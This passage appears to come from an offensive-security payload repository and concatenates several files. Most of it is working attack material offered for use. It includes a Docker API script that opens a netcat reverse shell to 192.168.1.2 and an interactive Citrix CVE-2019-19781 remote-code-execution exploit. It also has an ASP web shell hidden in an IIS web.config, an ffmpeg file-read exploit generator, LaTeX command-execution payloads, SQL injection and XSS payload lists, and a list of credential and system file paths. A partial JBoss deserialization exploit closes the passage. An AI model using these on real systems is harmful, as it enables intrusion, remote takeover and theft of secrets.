onDragEnter 34 | onDragLeave 35 | onDragOver 36 | onDragStart 37 | onDrop 38 | onEnd 39 | onError 40 | onErrorUpdate 41 | onFilterChange 42 | onFinish 43 | onFocus 44 | onFocusIn 45 | onFocusOut 46 | onHashChange 47 | onHelp 48 | onInput 49 | onKeyDown 50 | onKeyPress 51 | onKeyUp 52 | onLayoutComplete 53 | onLoad 54 | onLoseCapture 55 | onMediaComplete 56 | onMediaError 57 | onMessage 58 | onMouseDown 59 | onMouseEnter 60 | onMouseLeave 61 | onMouseMove 62 | onMouseOut 63 | onMouseOver 64 | onMouseUp 65 | onMouseWheel 66 | onMove 67 | onMoveEnd 68 | onMoveStart 69 | onOffline 70 | onOnline 71 | onOutOfSync 72 | onPaste 73 | onPause 74 | onPopState 75 | onProgress 76 | onPropertyChange 77 | onReadyStateChange 78 | onRedo 79 | onRepeat 80 | onReset 81 | onResize 82 | onResizeEnd 83 | onResizeStart 84 | onResume 85 | onReverse 86 | onRowDelete 87 | onRowExit 88 | onRowInserted 89 | onRowsEnter 90 | onScroll 91 | onSeek 92 | onSelect 93 | onSelectStart 94 | onSelectionChange 95 | onStart 96 | onStop 97 | onStorage 98 | onSubmit 99 | onSyncRestored 100 | onTimeError 101 | onTrackChange 102 | onURLFlip 103 | onUndo 104 | onUnload 105 | seekSegmentTime 106 | -------------------------------------------------------------------------------- /CVE Exploits/Docker API RCE.py: -------------------------------------------------------------------------------- 1 | from __future__ import print_function 2 | import requests 3 | import logging 4 | import json 5 | import urllib.parse 6 | 7 | # NOTE 8 | # Enable Remote API with the following command 9 | # /usr/bin/dockerd -H tcp://0.0.0.0:2375 -H unix:///var/run/docker.sock 10 | # This is an intended feature, remember to filter the port 2375.. 
11 | 12 | name = "docker" 13 | description = "Docker RCE via Open Docker API on port 2375" 14 | author = "Swissky" 15 | 16 | # Step 1 - Extract id and name from each container 17 | ip = "127.0.0.1" 18 | port = "2375" 19 | data = "containers/json" 20 | url = "http://{}:{}/{}".format(ip, port, data) 21 | r = requests.get(url) 22 | 23 | if r.json: 24 | for container in r.json(): 25 | container_id = container['Id'] 26 | container_name = container['Names'][0].replace('/','') 27 | print((container_id, container_name)) 28 | 29 | # Step 2 - Prepare command 30 | cmd = '["nc", "192.168.1.2", "4242", "-e", "/bin/sh"]' 31 | data = "containers/{}/exec".format(container_name) 32 | url = "http://{}:{}/{}".format(ip, port, data) 33 | post_json = '{ "AttachStdin":false,"AttachStdout":true,"AttachStderr":true, "Tty":false, "Cmd":'+cmd+' }' 34 | post_header = { 35 | "Content-Type": "application/json" 36 | } 37 | r = requests.post(url, json=json.loads(post_json)) 38 | 39 | 40 | # Step 3 - Execute command 41 | id_cmd = r.json()['Id'] 42 | data = "exec/{}/start".format(id_cmd) 43 | url = "http://{}:{}/{}".format(ip, port, data) 44 | post_json = '{ "Detach":false,"Tty":false}' 45 | post_header = { 46 | "Content-Type": "application/json" 47 | } 48 | r = requests.post(url, json=json.loads(post_json)) 49 | print(r) -------------------------------------------------------------------------------- /File Inclusion/Intruders/Linux-files.txt: -------------------------------------------------------------------------------- 1 | /etc/passwd 2 | /etc/group 3 | /etc/hosts 4 | /etc/motd 5 | /etc/issue 6 | /etc/bashrc 7 | /etc/apache2/apache2.conf 8 | /etc/apache2/ports.conf 9 | /etc/apache2/sites-available/default 10 | /etc/httpd/conf/httpd.conf 11 | /etc/httpd/conf.d 12 | /etc/httpd/logs/access.log 13 | /etc/httpd/logs/access_log 14 | /etc/httpd/logs/error.log 15 | /etc/httpd/logs/error_log 16 | /etc/init.d/apache2 17 | /etc/mysql/my.cnf 18 | /etc/nginx.conf 19 | /opt/lampp/logs/access_log 20 | 
/opt/lampp/logs/error_log 21 | /opt/lamp/log/access_log 22 | /opt/lamp/logs/error_log 23 | /proc/self/environ 24 | /proc/version 25 | /proc/cmdline 26 | /proc/mounts 27 | /proc/config.gz 28 | /root/.bashrc 29 | /root/.bash_history 30 | /root/.ssh/authorized_keys 31 | /root/.ssh/id_rsa 32 | /root/.ssh/id_rsa.keystore 33 | /root/.ssh/id_rsa.pub 34 | /root/.ssh/known_hosts 35 | /usr/local/apache/htdocs/index.html 36 | /usr/local/apache/conf/httpd.conf 37 | /usr/local/apache/conf/extra/httpd-ssl.conf 38 | /usr/local/apache/logs/error_log 39 | /usr/local/apache/logs/access_log 40 | /usr/local/apache/bin/apachectl 41 | /usr/local/apache2/htdocs/index.html 42 | /usr/local/apache2/conf/httpd.conf 43 | /usr/local/apache2/conf/extra/httpd-ssl.conf 44 | /usr/local/apache2/logs/error_log 45 | /usr/local/apache2/logs/access_log 46 | /usr/local/apache2/bin/apachectl 47 | /usr/local/etc/nginx/nginx.conf 48 | /usr/local/nginx/conf/nginx.conf 49 | /var/apache/logs/access_log 50 | /var/apache/logs/access.log 51 | /var/apache/logs/error_log 52 | /var/apache/logs/error.log 53 | /var/log/apache/access.log 54 | /var/log/apache/access_log 55 | /var/log/apache/error.log 56 | /var/log/apache/error_log 57 | /var/log/httpd/error_log 58 | /var/log/httpd/access_log 59 | /var/log/nginx/access_log 60 | /var/log/nginx/access.log 61 | /var/log/nginx/error_log 62 | /var/log/nginx/error.log -------------------------------------------------------------------------------- /LaTeX Injection/README.md: -------------------------------------------------------------------------------- 1 | # LaTex Injection 2 | 3 | ## Read file 4 | 5 | ```bash 6 | \input{/etc/passwd} 7 | \include{password} # load .tex file 8 | ``` 9 | 10 | Read single lined file 11 | 12 | ```bash 13 | \newread\file 14 | \openin\file=/etc/issue 15 | \read\file to\line 16 | \text{\line} 17 | \closein\file 18 | ``` 19 | 20 | Read multiple lined file 21 | 22 | ```bash 23 | \newread\file 24 | \openin\file=/etc/passwd 25 | \loop\unless\ifeof\file 
26 | \read\file to\fileline 27 | \text{\fileline} 28 | \repeat 29 | \closein\file 30 | ``` 31 | 32 | Read text file, keep the formatting 33 | 34 | ```bash 35 | \usepackage{verbatim} 36 | \verbatiminput{/etc/passwd} 37 | ``` 38 | 39 | ## Write file 40 | 41 | ```bash 42 | \newwrite\outfile 43 | \openout\outfile=cmd.tex 44 | \write\outfile{Hello-world} 45 | \closeout\outfile 46 | ``` 47 | 48 | ## Command execution 49 | 50 | The input of the command will be redirected to stdin, use a temp file to get it. 51 | 52 | ```bash 53 | \immediate\write18{env > output} 54 | \input{output} 55 | ``` 56 | 57 | If you get any LaTex error, consider using base64 to get the result without bad characters 58 | 59 | ```bash 60 | \immediate\write18{env | base64 > test.tex} 61 | \input{text.tex} 62 | ``` 63 | 64 | ```bash 65 | \input|ls|base4 66 | \input{|"/bin/hostname"} 67 | ``` 68 | 69 | ## Cross Site Scripting 70 | 71 | From [@EdOverflow](https://twitter.com/intigriti/status/1101509684614320130) 72 | ```bash 73 | \url{javascript:alert(1)} 74 | \href{javascript:alert(1)}{placeholder} 75 | ``` 76 | 77 | Live example at `http://payontriage.com/xss.php?xss=$\href{javascript:alert(1)}{Frogs%20find%20bugs}$` 78 | 79 | ## References 80 | 81 | * [Hacking with LaTeX - Sebastian Neef - 0day.work](https://0day.work/hacking-with-latex/) 82 | * [Latex to RCE, Private Bug Bounty Program - Yasho](https://medium.com/bugbountywriteup/latex-to-rce-private-bug-bounty-program-6a0b5b33d26a) 83 | * [Pwning coworkers thanks to LaTeX](http://scumjr.github.io/2016/11/28/pwning-coworkers-thanks-to-latex/) -------------------------------------------------------------------------------- /YOUTUBE.md: -------------------------------------------------------------------------------- 1 | # Youtube 2 | 3 | ## Channels 4 | 5 | - [IppSec Channel - Hack The Box Writeups](https://www.youtube.com/channel/UCa6eh7gCkpPo5XXUDfygQQA) 6 | - [LiveOverflow - Explore weird 
machines...](https://www.youtube.com/channel/UClcE-kVhqyiHCcjYwcpfj9w) 7 | - [GynvaelEN - Podcasts about CTFs, computer security, programing and similar things.](https://www.youtube.com/channel/UCCkVMojdBWS-JtH7TliWkVg) 8 | - [John Hammond - Wargames and CTF writeups](https://www.youtube.com/channel/UCVeW9qkBjo3zosnqUbG7CFw) 9 | - [Murmus CTF - Weekly live streamings](https://www.youtube.com/channel/UCUB9vOGEUpw7IKJRoR4PK-A) 10 | - [PwnFunction](https://www.youtube.com/channel/UCW6MNdOsqv2E9AjQkv9we7A) 11 | - [OJ Reeves](https://www.youtube.com/channel/UCz2aqRQWMhJ4wcJq3XneqRg) 12 | - [Hacksplained - A Beginner Friendly Guide to Hacking](https://www.youtube.com/c/hacksplained) 13 | - [STÖK](https://www.youtube.com/c/STOKfredrik) 14 | - [Defcon](https://www.youtube.com/user/DEFCONConference) 15 | - [Hackersploit](https://www.youtube.com/channel/UC0ZTPkdxlAKf-V33tqXwi3Q) 16 | - [The Cyber Mentor](https://www.youtube.com/channel/UC0ArlFuFYMpEewyRBzdLHiw) 17 | - [Nahamsec](https://www.youtube.com/c/Nahamsec) 18 | - [Hackerone](https://www.youtube.com/channel/UCsgzmECky2Q9lQMWzDwMhYw) 19 | - [The Hated one](https://www.youtube.com/channel/UCjr2bPAyPV7t35MvcgT3W8Q) 20 | - [stacksmashing / Ghidra Ninja](https://www.youtube.com/channel/UC3S8vxwRfqLBdIhgRlDRVzw) 21 | - [Hak5](https://www.youtube.com/channel/UC3s0BtrBJpwNDaflRSoiieQ) 22 | 23 | ## Conferences 24 | 25 | - [Hunting for Top Bounties - Nicolas Grégoire](https://www.youtube.com/watch?v=mQjTgDuLsp4) 26 | - [BSidesSF 101 The Tales of a Bug Bounty Hunter - Arne Swinnen](https://www.youtube.com/watch?v=dsekKYNLBbc) 27 | - [Security Fest 2016 The Secret life of a Bug Bounty Hunter - Frans Rosén](https://www.youtube.com/watch?v=KDo68Laayh8) 28 | - [The Conscience of a Hacker](https://www.youtube.com/watch?v=0tEnnvZbYek) 29 | - [Defcon 2020 Talks](https://www.youtube.com/user/DEFCONConference/videos) 30 | -------------------------------------------------------------------------------- /SQL 
Injection/Intruder/FUZZDB_MySQL-WHERE_Time.txt: -------------------------------------------------------------------------------- 1 | and 0=benchmark(3000000,MD5(1))%20/* 2 | and 0=benchmark(3000000,MD5(1))%20-- 3 | and 0=benchmark(3000000,MD5(1))%20%23 4 | ' and 0=benchmark(3000000,MD5(1))%20/* 5 | ' and 0=benchmark(3000000,MD5(1))%20-- 6 | ' and 0=benchmark(3000000,MD5(1))%20%23 7 | " and 0=benchmark(3000000,MD5(1))%20/* 8 | " and 0=benchmark(3000000,MD5(1))%20-- 9 | " and 0=benchmark(3000000,MD5(1))%20%23 10 | ) and 0=benchmark(3000000,MD5(1))%20/* 11 | ) and 0=benchmark(3000000,MD5(1))%20-- 12 | ) and 0=benchmark(3000000,MD5(1))%20%23 13 | )) and 0=benchmark(3000000,MD5(1))%20/* 14 | )) and 0=benchmark(3000000,MD5(1))%20-- 15 | )) and 0=benchmark(3000000,MD5(1))%20%23 16 | ))) and 0=benchmark(3000000,MD5(1))%20/* 17 | ))) and 0=benchmark(3000000,MD5(1))%20-- 18 | ))) and 0=benchmark(3000000,MD5(1))%20%23 19 | )))) and 0=benchmark(3000000,MD5(1))%20/* 20 | )))) and 0=benchmark(3000000,MD5(1))%20-- 21 | )))) and 0=benchmark(3000000,MD5(1))%20%23 22 | ') and 0=benchmark(3000000,MD5(1))%20/* 23 | ') and 0=benchmark(3000000,MD5(1))%20-- 24 | ') and 0=benchmark(3000000,MD5(1))%20%23 25 | ") and 0=benchmark(3000000,MD5(1))%20/* 26 | ") and 0=benchmark(3000000,MD5(1))%20-- 27 | ") and 0=benchmark(3000000,MD5(1))%20%23 28 | ')) and 0=benchmark(3000000,MD5(1))%20/* 29 | ')) and 0=benchmark(3000000,MD5(1))%20-- 30 | ')) and 0=benchmark(3000000,MD5(1))%20%23 31 | ")) and 0=benchmark(3000000,MD5(1))%20/* 32 | ")) and 0=benchmark(3000000,MD5(1))%20-- 33 | ")) and 0=benchmark(3000000,MD5(1))%20%23 34 | '))) and 0=benchmark(3000000,MD5(1))%20/* 35 | '))) and 0=benchmark(3000000,MD5(1))%20-- 36 | '))) and 0=benchmark(3000000,MD5(1))%20%23 37 | "))) and 0=benchmark(3000000,MD5(1))%20/* 38 | "))) and 0=benchmark(3000000,MD5(1))%20-- 39 | "))) and 0=benchmark(3000000,MD5(1))%20%23 40 | ')))) and 0=benchmark(3000000,MD5(1))%20/* 41 | ')))) and 0=benchmark(3000000,MD5(1))%20-- 42 | 
')))) and 0=benchmark(3000000,MD5(1))%20%23 43 | ")))) and 0=benchmark(3000000,MD5(1))%20/* 44 | ")))) and 0=benchmark(3000000,MD5(1))%20-- 45 | ")))) and 0=benchmark(3000000,MD5(1))%20%23 -------------------------------------------------------------------------------- /SQL Injection/Intruder/payloads-sql-blind-MySQL-WHERE: -------------------------------------------------------------------------------- 1 | and 0=benchmark(3000000,MD5(1))%20/* 2 | and 0=benchmark(3000000,MD5(1))%20-- 3 | and 0=benchmark(3000000,MD5(1))%20%23 4 | ' and 0=benchmark(3000000,MD5(1))%20/* 5 | ' and 0=benchmark(3000000,MD5(1))%20-- 6 | ' and 0=benchmark(3000000,MD5(1))%20%23 7 | " and 0=benchmark(3000000,MD5(1))%20/* 8 | " and 0=benchmark(3000000,MD5(1))%20-- 9 | " and 0=benchmark(3000000,MD5(1))%20%23 10 | ) and 0=benchmark(3000000,MD5(1))%20/* 11 | ) and 0=benchmark(3000000,MD5(1))%20-- 12 | ) and 0=benchmark(3000000,MD5(1))%20%23 13 | )) and 0=benchmark(3000000,MD5(1))%20/* 14 | )) and 0=benchmark(3000000,MD5(1))%20-- 15 | )) and 0=benchmark(3000000,MD5(1))%20%23 16 | ))) and 0=benchmark(3000000,MD5(1))%20/* 17 | ))) and 0=benchmark(3000000,MD5(1))%20-- 18 | ))) and 0=benchmark(3000000,MD5(1))%20%23 19 | )))) and 0=benchmark(3000000,MD5(1))%20/* 20 | )))) and 0=benchmark(3000000,MD5(1))%20-- 21 | )))) and 0=benchmark(3000000,MD5(1))%20%23 22 | ') and 0=benchmark(3000000,MD5(1))%20/* 23 | ') and 0=benchmark(3000000,MD5(1))%20-- 24 | ') and 0=benchmark(3000000,MD5(1))%20%23 25 | ") and 0=benchmark(3000000,MD5(1))%20/* 26 | ") and 0=benchmark(3000000,MD5(1))%20-- 27 | ") and 0=benchmark(3000000,MD5(1))%20%23 28 | ')) and 0=benchmark(3000000,MD5(1))%20/* 29 | ')) and 0=benchmark(3000000,MD5(1))%20-- 30 | ')) and 0=benchmark(3000000,MD5(1))%20%23 31 | ")) and 0=benchmark(3000000,MD5(1))%20/* 32 | ")) and 0=benchmark(3000000,MD5(1))%20-- 33 | ")) and 0=benchmark(3000000,MD5(1))%20%23 34 | '))) and 0=benchmark(3000000,MD5(1))%20/* 35 | '))) and 0=benchmark(3000000,MD5(1))%20-- 36 | '))) and 
0=benchmark(3000000,MD5(1))%20%23 37 | "))) and 0=benchmark(3000000,MD5(1))%20/* 38 | "))) and 0=benchmark(3000000,MD5(1))%20-- 39 | "))) and 0=benchmark(3000000,MD5(1))%20%23 40 | ')))) and 0=benchmark(3000000,MD5(1))%20/* 41 | ')))) and 0=benchmark(3000000,MD5(1))%20-- 42 | ')))) and 0=benchmark(3000000,MD5(1))%20%23 43 | ")))) and 0=benchmark(3000000,MD5(1))%20/* 44 | ")))) and 0=benchmark(3000000,MD5(1))%20-- 45 | ")))) and 0=benchmark(3000000,MD5(1))%20%23 46 | -------------------------------------------------------------------------------- /CVE Exploits/Citrix CVE-2019-19781.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | # https://github.com/mpgn/CVE-2019-19781 3 | # # # 4 | 5 | import requests 6 | import string 7 | import random 8 | import re 9 | import sys 10 | from requests.packages.urllib3.exceptions import InsecureRequestWarning 11 | requests.packages.urllib3.disable_warnings(InsecureRequestWarning) 12 | 13 | print("CVE-2019-19781 - Remote Code Execution in Citrix Application Delivery Controller and Citrix Gateway") 14 | print("Found by Mikhail Klyuchnikov") 15 | print("") 16 | 17 | if len(sys.argv) < 2: 18 | print("[-] No URL provided") 19 | sys.exit(0) 20 | 21 | while True: 22 | try: 23 | command = input("command > ") 24 | 25 | random_xml = ''.join(random.choices(string.ascii_uppercase + string.digits, k=12)) 26 | print("[+] Adding bookmark", random_xml + ".xml") 27 | 28 | burp0_url = sys.argv[1] + "/vpn/../vpns/portal/scripts/newbm.pl" 29 | burp0_headers = {"NSC_USER": "../../../../netscaler/portal/templates/" + 30 | random_xml, "NSC_NONCE": "c", "Connection": "close"} 31 | burp0_data = {"url": "http://exemple.com", "title": "[%t=template.new({'BLOCK'='print `" + str(command) + "`'})%][ % t % ]", "desc": "test", "UI_inuse": "RfWeb"} 32 | r = requests.post(burp0_url, headers=burp0_headers, data=burp0_data,verify=False) 33 | 34 | if r.status_code == 200: 35 | print("[+] Bookmark added") 
36 | else: 37 | print("\n[-] Target not vulnerable or something went wrong") 38 | sys.exit(0) 39 | 40 | burp0_url = sys.argv[1] + "/vpns/portal/" + random_xml + ".xml" 41 | burp0_headers = {"NSC_USER": "../../../../netscaler/portal/templates/" + 42 | random_xml, "NSC_NONCE": "c", "Connection": "close"} 43 | r = requests.get(burp0_url, headers=burp0_headers,verify=False) 44 | 45 | replaced = re.sub('^&#.*&#10;$', '', r.text, flags=re.MULTILINE) 46 | print("[+] Result of the command: \n") 47 | print(replaced) 48 | 49 | except KeyboardInterrupt: 50 | print("Exiting...") 51 | break -------------------------------------------------------------------------------- /BOOKS.md: -------------------------------------------------------------------------------- 1 | # Book's list 2 | 3 | Grab a book and relax, these ones are the best security books (in my opinion). 4 | 5 | - [Web Hacking 101](https://leanpub.com/web-hacking-101) 6 | - [Breaking into Information Security: Learning the Ropes 101 - Andrew Gill](https://leanpub.com/ltr101-breaking-into-infosec) 7 | - [OWASP Testing Guide v4](https://www.owasp.org/index.php/OWASP_Testing_Project) 8 | - [Penetration Testing: A Hands-On Introduction to Hacking](http://amzn.to/2dhHTSn) 9 | - [The Hacker Playbook 2: Practical Guide to Penetration Testing](http://amzn.to/2d9wYKa) 10 | - [The Hacker Playbook 3: Practical Guide to Penetration Testing - Red Team Edition](http://a.co/6MqC9bD) 11 | - [The Mobile Application Hacker’s Handbook](http://amzn.to/2cVOIrE) 12 | - [Black Hat Python: Python Programming for Hackers and Pentesters](http://www.amazon.com/Black-Hat-Python-Programming-Pentesters/dp/1593275900) 13 | - [Metasploit: The Penetration Tester's Guide](https://www.nostarch.com/metasploit) 14 | - [The Database Hacker's Handbook, David Litchfield et al., 2005](http://www.wiley.com/WileyCDA/WileyTitle/productCd-0764578014.html) 15 | - [The Shellcoders Handbook by Chris Anley et al., 
2007](http://www.wiley.com/WileyCDA/WileyTitle/productCd-047008023X.html) 16 | - [The Mac Hacker's Handbook by Charlie Miller & Dino Dai Zovi, 2009](http://www.wiley.com/WileyCDA/WileyTitle/productCd-0470395362.html) 17 | - [The Web Application Hackers Handbook by D. Stuttard, M. Pinto, 2011](http://www.wiley.com/WileyCDA/WileyTitle/productCd-1118026470.html) 18 | - [iOS Hackers Handbook by Charlie Miller et al., 2012](http://www.wiley.com/WileyCDA/WileyTitle/productCd-1118204123.html) 19 | - [Android Hackers Handbook by Joshua J. Drake et al., 2014](http://www.wiley.com/WileyCDA/WileyTitle/productCd-111860864X.html) 20 | - [The Browser Hackers Handbook by Wade Alcorn et al., 2014](http://www.wiley.com/WileyCDA/WileyTitle/productCd-1118662091.html) 21 | - [The Mobile Application Hackers Handbook by Dominic Chell et al., 2015](http://www.wiley.com/WileyCDA/WileyTitle/productCd-1118958500.html) 22 | - [Car Hacker's Handbook by Craig Smith, 2016](https://www.nostarch.com/carhacking) 23 | -------------------------------------------------------------------------------- /Race Condition/README.md: -------------------------------------------------------------------------------- 1 | # Race Condition 2 | 3 | > Race conditions may occur when a process is critically or unexpectedly dependent on the sequence or timings of other events. In a web application environment, where multiple requests can be processed at a given time, developers may leave concurrency to be handled by the framework, server, or programming language. 4 | 5 | ## Summary 6 | 7 | * [Tools](#tools) 8 | * [Turbo Intruder Examples](#turbo-intruder-examples) 9 | * [References](#references) 10 | 11 | ## Tools 12 | 13 | * [Turbo Intruder - a Burp Suite extension for sending large numbers of HTTP requests and analyzing the results.](https://github.com/PortSwigger/turbo-intruder) 14 | 15 | ## Turbo Intruder Examples 16 | 17 | 1. Send request to turbo intruder 18 | 2. 
Use this python code as a payload of the turbo intruder 19 | ```python 20 | def queueRequests(target, wordlists): 21 | engine = RequestEngine(endpoint=target.endpoint, 22 | concurrentConnections=30, 23 | requestsPerConnection=30, 24 | pipeline=False 25 | ) 26 | 27 | for i in range(30): 28 | engine.queue(target.req, i) 29 | engine.queue(target.req, target.baseInput, gate='race1') 30 | 31 | 32 | engine.start(timeout=5) 33 | engine.openGate('race1') 34 | 35 | engine.complete(timeout=60) 36 | 37 | 38 | def handleResponse(req, interesting): 39 | table.add(req) 40 | ``` 41 | 3. Now set the external HTTP header x-request: %s - :warning: This is needed by the turbo intruder 42 | 4. Click "Attack" 43 | 44 | 45 | ## References 46 | 47 | * [Race Condition allows to redeem multiple times gift cards which leads to free "money" - @muon4](https://hackerone.com/reports/759247) 48 | * [Turbo Intruder: Embracing the billion-request attack - James Kettle | 25 January 2019](https://portswigger.net/research/turbo-intruder-embracing-the-billion-request-attack) 49 | * [Race Condition Bug In Web App: A Use Case - Mandeep Jadon](https://medium.com/@ciph3r7r0ll/race-condition-bug-in-web-app-a-use-case-21fd4df71f0e) -------------------------------------------------------------------------------- /Upload Insecure Files/Configuration IIS web.config/web.web.config: -------------------------------------------------------------------------------- 1 | <?xml version="1.0" encoding="UTF-8"?> 2 | <configuration> 3 | <system.webServer> 4 | <handlers accessPolicy="Read, Script, Write"> 5 | <add name="web_config" path="*.config" verb="*" modules="IsapiModule" scriptProcessor="%windir%\system32\inetsrv\asp.dll" resourceType="Unspecified" requireAccess="Write" preCondition="bitness64" /> 6 | </handlers> 7 | <security> 8 | <requestFiltering> 9 | <fileExtensions> 10 | <remove fileExtension=".config" /> 11 | </fileExtensions> 12 | <hiddenSegments> 13 | <remove segment="web.config" /> 14 | </hiddenSegments> 
15 | </requestFiltering> 16 | </security> 17 | </system.webServer> 18 | </configuration> 19 | <!-- 20 | <% Response.write("-"&"->")%> 21 | <% 22 | Set oScript = Server.CreateObject("WSCRIPT.SHELL") 23 | Set oScriptNet = Server.CreateObject("WSCRIPT.NETWORK") 24 | Set oFileSys = Server.CreateObject("Scripting.FileSystemObject") 25 | 26 | Function getCommandOutput(theCommand) 27 | Dim objShell, objCmdExec 28 | Set objShell = CreateObject("WScript.Shell") 29 | Set objCmdExec = objshell.exec(thecommand) 30 | 31 | getCommandOutput = objCmdExec.StdOut.ReadAll 32 | end Function 33 | %> 34 | 35 | <BODY> 36 | <FORM action="" method="GET"> 37 | <input type="text" name="cmd" size=45 value="<%= szCMD %>"> 38 | <input type="submit" value="Run"> 39 | </FORM> 40 | 41 | <PRE> 42 | <%= "\\" & oScriptNet.ComputerName & "\" & oScriptNet.UserName %> 43 | <%Response.Write(Request.ServerVariables("server_name"))%> 44 | <p> 45 | <b>The server's port:</b> 46 | <%Response.Write(Request.ServerVariables("server_port"))%> 47 | </p> 48 | <p> 49 | <b>The server's software:</b> 50 | <%Response.Write(Request.ServerVariables("server_software"))%> 51 | </p> 52 | <p> 53 | <b>The server's software:</b> 54 | <%Response.Write(Request.ServerVariables("LOCAL_ADDR"))%> 55 | <% szCMD = request("cmd") 56 | thisDir = getCommandOutput("cmd /c" & szCMD) 57 | Response.Write(thisDir)%> 58 | </p> 59 | <br> 60 | </BODY> 61 | 62 | 63 | 64 | <%Response.write("<!-"&"-") %> 65 | --> 66 | -------------------------------------------------------------------------------- /Upload Insecure Files/CVE Ffmpeg HLS/gen_avi_bypass.py: -------------------------------------------------------------------------------- 1 | import struct 2 | import argparse 3 | 4 | AVI_HEADER = b"RIFF\x00\x00\x00\x00AVI 
LIST\x14\x01\x00\x00hdrlavih8\x00\x00\x00@\x9c\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00}\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00\x00\x00\x00\x00\x00\xe0\x00\x00\x00\xa0\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00LISTt\x00\x00\x00strlstrh8\x00\x00\x00txts\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x19\x00\x00\x00\x00\x00\x00\x00}\x00\x00\x00\x86\x03\x00\x00\x10'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xe0\x00\xa0\x00strf(\x00\x00\x00(\x00\x00\x00\xe0\x00\x00\x00\xa0\x00\x00\x00\x01\x00\x18\x00XVID\x00H\x03\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00LIST movi" 5 | 6 | 7 | def make_txt_packet(content, fake_packets=50, fake_packet_len=200): 8 | content = b'GAB2\x00\x02\x00' + b'\x00' * 10 + content 9 | packet = b'00tx' + struct.pack('<I', len(content)) + content 10 | dcpkt = b'00dc' + struct.pack('<I', fake_packet_len) + b'\x00' * fake_packet_len 11 | return packet + dcpkt * fake_packets 12 | 13 | TXT_PLAYLIST = """#EXTM3U 14 | #EXT-X-MEDIA-SEQUENCE:0 15 | #EXTINF:1.0, 16 | #EXT-X-BYTERANGE: 0 17 | {txt} 18 | #EXTINF:1.0, 19 | {file} 20 | #EXT-X-ENDLIST""" 21 | 22 | def prepare_txt_packet(txt, filename): 23 | return make_txt_packet(TXT_PLAYLIST.format(txt=txt, file=filename).encode()) 24 | 25 | # TXT_LIST = ['/usr/share/doc/gnupg/Upgrading_From_PGP.txt', '/usr/share/doc/mount/mount.txt', '/etc/pki/nssdb/pkcs11.txt', '/usr/share/gnupg/help.txt'] 26 | 27 | if __name__ == "__main__": 28 | parser = argparse.ArgumentParser('HLS AVI TXT exploit generator') 29 | parser.add_argument('filename', help='file that should be read from convertion instance') 30 | parser.add_argument('output_avi', help='where to save the avi') 31 | parser.add_argument('--txt', help='any .txt file that exist on target system', default='GOD.txt') 32 | args = parser.parse_args() 33 | avi = AVI_HEADER + prepare_txt_packet(args.txt, args.filename) 34 | output_name = args.output_avi 35 | 36 | with 
open(output_name, 'wb') as f: 37 | f.write(avi) 38 | 39 | -------------------------------------------------------------------------------- /XSS Injection/XSS with Relative Path Overwrite.md: -------------------------------------------------------------------------------- 1 | # XSS with Relative Path Overwrite - IE 8/9 and lower 2 | 3 | You need these 3 components 4 | 5 | ```javascript 6 | 1) stored XSS that allows CSS injection. : {}*{xss:expression(open(alert(1)))} 7 | 2) URL Rewriting. 8 | 3) Relative addressing to CSS style sheet : ../style.css 9 | ``` 10 | 11 | A little example 12 | 13 | ```html 14 | http://url.example.com/index.php/[RELATIVE_URL_INSERTED_HERE] 15 | <html> 16 | <head> 17 | <meta http-equiv="X-UA-Compatible" content="IE=EmulateIE7" /> 18 | <link href="[RELATIVE_URL_INSERTED_HERE]/styles.css" rel="stylesheet" type="text/css" /> 19 | </head> 20 | <body> 21 | Stored XSS with CSS injection - Hello {}*{xss:expression(open(alert(1)))} 22 | </body> 23 | </html> 24 | ``` 25 | 26 | Explanation of the vulnerability 27 | 28 | > The Meta element forces IE’s document mode into IE7 compat which is required to execute expressions. Our persistent text {}*{xss:expression(open(alert(1)))is included on the page and in a realistic scenario it would be a profile page or maybe a shared status update which is viewable by other users. We use “open” to prevent client side DoS with repeated executions of alert. 29 | > A simple request of “rpo.php/” makes the relative style load the page itself as a style sheet. The actual request is “/labs/xss_horror_show/chapter7/rpo.php/styles.css” the browser thinks there’s another directory but the actual request is being sent to the document and that in essence is how an RPO attack works. 
30 | 31 | Demo 1 at `http://challenge.hackvertor.co.uk/xss_horror_show/chapter7/rpo.php` 32 | Demo 2 at `http://challenge.hackvertor.co.uk/xss_horror_show/chapter7/rpo2.php/fakedirectory/fakedirectory2/fakedirectory3` 33 | MultiBrowser : `http://challenge.hackvertor.co.uk/xss_horror_show/chapter7/rpo3.php` 34 | 35 | From : `http://www.thespanner.co.uk/2014/03/21/rpo/` 36 | 37 | ## Mutated XSS for Browser IE8/IE9 38 | 39 | ```javascript 40 | <listing id=x>&lt;img src=1 onerror=alert(1)&gt;</listing> 41 | <script>alert(document.getElementById('x').innerHTML)</script> 42 | ``` 43 | 44 | IE will read and write (decode) HTML multiple time and attackers XSS payload will mutate and execute. 45 | 46 | 47 | ## References 48 | 49 | - [TODO](TODO) -------------------------------------------------------------------------------- /CVE Exploits/JBoss CVE-2015-7501.py: -------------------------------------------------------------------------------- 1 | #! /usr/bin/env python2 2 | 3 | # Jboss Java Deserialization RCE (CVE-2015-7501) 4 | # Made with <3 by @byt3bl33d3r 5 | 6 | from __future__ import print_function 7 | import requests 8 | from requests.packages.urllib3.exceptions import InsecureRequestWarning 9 | requests.packages.urllib3.disable_warnings(InsecureRequestWarning) 10 | 11 | import argparse 12 | import sys, os 13 | #from binascii import hexlify, unhexlify 14 | from subprocess import check_output 15 | 16 | ysoserial_default_paths = ['./ysoserial.jar', '../ysoserial.jar'] 17 | ysoserial_path = None 18 | 19 | parser = argparse.ArgumentParser() 20 | parser.add_argument('target', type=str, help='Target IP') 21 | parser.add_argument('command', type=str, help='Command to run on target') 22 | parser.add_argument('--proto', choices={'http', 'https'}, default='http', help='Send exploit over http or https (default: http)') 23 | parser.add_argument('--ysoserial-path', metavar='PATH', type=str, help='Path to ysoserial JAR (default: tries current and previous directory)') 24 | 25 | if 
